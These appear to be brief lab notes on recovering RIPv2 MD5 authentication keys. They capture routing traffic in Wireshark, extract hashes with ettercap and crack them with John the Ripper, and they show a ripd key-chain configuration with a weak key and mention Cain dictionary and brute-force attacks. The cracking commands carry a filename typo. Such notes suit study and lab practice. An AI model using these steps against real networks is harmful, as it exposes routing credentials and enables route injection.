1. Capture Wireshark
2. Save as a file like ripv2.pcapng
3. ettercap -Tr ./ripv2.pcapng > ./johh-pass
4. john --format=net-md5 ./john-pass
ripd(config)# int eth0
ripd(config-if)#ip rip authentication mode md5
ripd(config-if)#ip rip authentication key-chain RIP
ripd(config-if)#exit
ripd(config)#key chain RIP
ripd(config-keychain)#key 1
ripd(config-keychain-key)#key-string cisco
ripd(config-keychain-key)#end
Another way to use Cain on XP
1. Dictionary attack
2. Brute Attack.